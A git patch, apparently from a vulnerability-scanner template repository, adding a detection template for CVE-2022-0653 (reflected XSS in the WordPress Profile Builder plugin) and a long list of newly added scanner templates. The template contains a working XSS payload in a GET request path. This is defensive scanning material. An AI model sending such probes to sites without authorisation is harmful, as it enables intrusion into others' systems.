From 1f9c5311ab50c259d0f41cdf21e08e5a77533856 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Thu, 24 Feb 2022 17:03:20 +0530
Subject: [PATCH] =?UTF-8?q?CVE-2022-0653=20Wordpress=20Profile=20Builder?=
 =?UTF-8?q?=20=E2=80=93=20User=20Profile=20&=20User=20Registration=20Forms?=
 =?UTF-8?q?=20(#3761)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* Auto Generated New Template Addition List [Wed Feb 23 16:10:39 UTC 2022] :robot:

* Create CVE-2022-0653.yaml

* Auto Generated New Template Addition List [Wed Feb 23 16:13:51 UTC 2022] :robot:

* misc updates

* Auto Generated New Template Addition List [Thu Feb 24 11:29:05 UTC 2022] :robot:

Co-authored-by: GitHub Action <action@github.com>
Co-authored-by: sandeep <sandeep@projectdiscovery.io>
---
 .new-additions               | 145 +++++++++++++++++++++++++++++++++++
 cves/2022/CVE-2022-0653.yaml |  30 ++++++++
 2 files changed, 175 insertions(+)
 create mode 100644 cves/2022/CVE-2022-0653.yaml

diff --git a/.new-additions b/.new-additions
index ebc716a391..6cbe4c4924 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,24 +1,169 @@
+cves/2009/CVE-2009-5020.yaml
+cves/2012/CVE-2012-4547.yaml
+cves/2013/CVE-2013-7091.yaml
+cves/2016/CVE-2016-10940.yaml
+cves/2016/CVE-2016-3978.yaml
+cves/2018/CVE-2018-1000226.yaml
+cves/2018/CVE-2018-18925.yaml
+cves/2018/CVE-2018-7602.yaml
 cves/2019/CVE-2019-1010290.yaml
+cves/2019/CVE-2019-10758.yaml
+cves/2019/CVE-2019-13396.yaml
+cves/2019/CVE-2019-3911.yaml
+cves/2019/CVE-2019-3912.yaml
+cves/2020/CVE-2020-12447.yaml
+cves/2020/CVE-2020-18268.yaml
+cves/2020/CVE-2020-24391.yaml
+cves/2020/CVE-2020-25864.yaml
+cves/2020/CVE-2020-35749.yaml
+cves/2020/CVE-2020-36365.yaml
+cves/2021/CVE-2021-20150.yaml
+cves/2021/CVE-2021-20158.yaml
+cves/2021/CVE-2021-20792.yaml
+cves/2021/CVE-2021-21973.yaml
+cves/2021/CVE-2021-24300.yaml
+cves/2021/CVE-2021-24488.yaml
+cves/2021/CVE-2021-24510.yaml
+cves/2021/CVE-2021-24750.yaml
+cves/2021/CVE-2021-24838.yaml
+cves/2021/CVE-2021-24926.yaml
+cves/2021/CVE-2021-24947.yaml
+cves/2021/CVE-2021-24991.yaml
+cves/2021/CVE-2021-25008.yaml
+cves/2021/CVE-2021-25028.yaml
+cves/2021/CVE-2021-25052.yaml
 cves/2021/CVE-2021-25063.yaml
+cves/2021/CVE-2021-25074.yaml
+cves/2021/CVE-2021-25864.yaml
+cves/2021/CVE-2021-26247.yaml
+cves/2021/CVE-2021-32682.yaml
+cves/2021/CVE-2021-32853.yaml
 cves/2021/CVE-2021-3293.yaml
+cves/2021/CVE-2021-34640.yaml
+cves/2021/CVE-2021-34643.yaml
+cves/2021/CVE-2021-39322.yaml
+cves/2021/CVE-2021-39350.yaml
+cves/2021/CVE-2021-39433.yaml
+cves/2021/CVE-2021-40323.yaml
 cves/2021/CVE-2021-43062.yaml
+cves/2021/CVE-2021-43810.yaml
+cves/2021/CVE-2021-45380.yaml
+cves/2021/CVE-2021-46005.yaml
 cves/2022/CVE-2022-0149.yaml
+cves/2022/CVE-2022-0218.yaml
+cves/2022/CVE-2022-0281.yaml
+cves/2022/CVE-2022-0378.yaml
+cves/2022/CVE-2022-0432.yaml
+cves/2022/CVE-2022-0653.yaml
+cves/2022/CVE-2022-23178.yaml
+cves/2022/CVE-2022-23808.yaml
+cves/2022/CVE-2022-23944.yaml
 cves/2022/CVE-2022-24112.yaml
 cves/2022/CVE-2022-25323.yaml
+default-logins/cobbler/cobbler-default-login.yaml
+default-logins/gophish/gophish-default-login.yaml
+default-logins/huawei/huawei-HG532e-default-router-login.yaml
+default-logins/jboss/jmx-default-login.yaml
+default-logins/mofi/mofi4500-default-login.yaml
+default-logins/netsus/netsus-default-login.yaml
+default-logins/versa/versa-default-login.yaml
+default-logins/xerox/xerox7-default-login.yaml
+exposed-panels/alfresco-detect.yaml
+exposed-panels/atvise-login.yaml
+exposed-panels/bigbluebutton-login.yaml
+exposed-panels/cisco/cisco-ucs-kvm-login.yaml
+exposed-panels/cobbler-webgui.yaml
+exposed-panels/code42-panel.yaml
+exposed-panels/concrete5/concrete5-install.yaml
+exposed-panels/concrete5/concrete5-panel.yaml
+exposed-panels/ecosys-command-center.yaml
+exposed-panels/flightpath-panel.yaml
+exposed-panels/gophish-login.yaml
+exposed-panels/hashicorp-consul-agent.yaml
+exposed-panels/hashicorp-consul-webgui.yaml
+exposed-panels/jamf-panel.yaml
+exposed-panels/netdata-dashboard-detected.yaml
+exposed-panels/netsus-server-login.yaml
+exposed-panels/openbmcs-detect.yaml
 exposed-panels/otobo-panel.yaml
+exposed-panels/projectsend-login.yaml
 exposed-panels/pypicloud-panel.yaml
+exposed-panels/qualcomm-voip-router.yaml
+exposed-panels/seeddms-panel.yaml
+exposed-panels/strapi-documentation.yaml
+exposed-panels/submitty-login.yaml
+exposed-panels/teltonika-login.yaml
+exposed-panels/terraform-enterprise-panel.yaml
+exposed-panels/threatq-login.yaml
+exposed-panels/trendnet/trendnet-tew827dru-login.yaml
+exposed-panels/typo3-login.yaml
 exposed-panels/unauth-xproxy-dashboard.yaml
+exposed-panels/versa-sdwan.yaml
+exposed-panels/voipmonitor-panel.yaml
+exposed-panels/wallix-accessmanager-panel.yaml
+exposed-panels/wazuh-panel.yaml
+exposed-panels/webmodule-ee-panel.yaml
+exposed-panels/xxljob-panel.yaml
+exposed-panels/zblogphp-panel.yaml
+misconfiguration/caddy-open-redirect.yaml
+misconfiguration/cobbler-exposed-directory.yaml
+misconfiguration/misconfigured-concrete5.yaml
+misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml
+misconfiguration/openbmcs/openbmcs-ssrf.yaml
+ssl/deprecated-tls.yaml
+takeovers/gitbook-takeover.yaml
 takeovers/short-io.yaml
+technologies/airtame-device-detect.yaml
+technologies/apollo-server-detect.yaml
+technologies/appcms-detect.yaml
+technologies/cobbler-version.yaml
+technologies/erxes-detect.yaml
+technologies/gnuboard-detect.yaml
+technologies/interactsh-server.yaml
+technologies/lexmark-detect.yaml
+technologies/metatag-cms.yaml
+technologies/projectsend-detect.yaml
 technologies/roundcube-webmail-portal.yaml
+technologies/smartstore-detect.yaml
+technologies/typo3-detect.yaml
 technologies/web-suite-detect.yaml
 technologies/zerof-webserver-detect.yaml
+vulnerabilities/gitlab/gitlab-rce.yaml
+vulnerabilities/jamf/jamf-blind-xxe.yaml
+vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
+vulnerabilities/joomla/rusty-joomla.yaml
+vulnerabilities/laravel/laravel-ignition-xss.yaml
+vulnerabilities/other/antsword-backdoor.yaml
 vulnerabilities/other/goip-1-lfi.yaml
+vulnerabilities/other/java-melody-xss.yaml
+vulnerabilities/other/kyocera-m2035dn-lfi.yaml
 vulnerabilities/other/otobo-open-redirect.yaml
 vulnerabilities/other/pollbot-redirect.yaml
+vulnerabilities/other/yishaadmin-lfi.yaml
+vulnerabilities/ransomware/deadbolt-ransomware.yaml
 vulnerabilities/wordpress/accessibility-helper-xss.yaml
+vulnerabilities/wordpress/candidate-application-lfi.yaml
+vulnerabilities/wordpress/cherry-lfi.yaml
+vulnerabilities/wordpress/churchope-lfi.yaml
+vulnerabilities/wordpress/db-backup-lfi.yaml
 vulnerabilities/wordpress/easy-social-feed.yaml
+vulnerabilities/wordpress/elementorpage-open-redirect.yaml
 vulnerabilities/wordpress/elex-woocommerce-xss.yaml
 vulnerabilities/wordpress/feedwordpress-xss.yaml
+vulnerabilities/wordpress/hb-audio-lfi.yaml
+vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml
 vulnerabilities/wordpress/mthemeunus-lfi.yaml
+vulnerabilities/wordpress/music-store-open-redirect.yaml
 vulnerabilities/wordpress/my-chatbot-xss.yaml
+vulnerabilities/wordpress/newsletter-open-redirect.yaml
+vulnerabilities/wordpress/ninjaform-open-redirect.yaml
+vulnerabilities/wordpress/noptin-open-redirect.yaml
+vulnerabilities/wordpress/shortcode-lfi.yaml
+vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
+vulnerabilities/wordpress/sniplets-lfi.yaml
+vulnerabilities/wordpress/sniplets-xss.yaml
+vulnerabilities/wordpress/wp-code-snippets-xss.yaml
+vulnerabilities/wordpress/wp-spot-premium-lfi.yaml
 vulnerabilities/wordpress/wp-whmcs-xss.yaml
+workflows/concrete-workflow.yaml
+workflows/gophish-workflow.yaml
diff --git a/cves/2022/CVE-2022-0653.yaml b/cves/2022/CVE-2022-0653.yaml
new file mode 100644
index 0000000000..114ac988f7
--- /dev/null
+++ b/cves/2022/CVE-2022-0653.yaml
@@ -0,0 +1,30 @@
+id: CVE-2022-0653
+
+info:
+  name: Wordpress Profile Builder Plugin XSS
+  author: dhiyaneshDk
+  severity: medium
+  reference:
+    - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
+  tags: cve,cve2022,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<a href="javascript:alert(document.domain);">here</a>'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200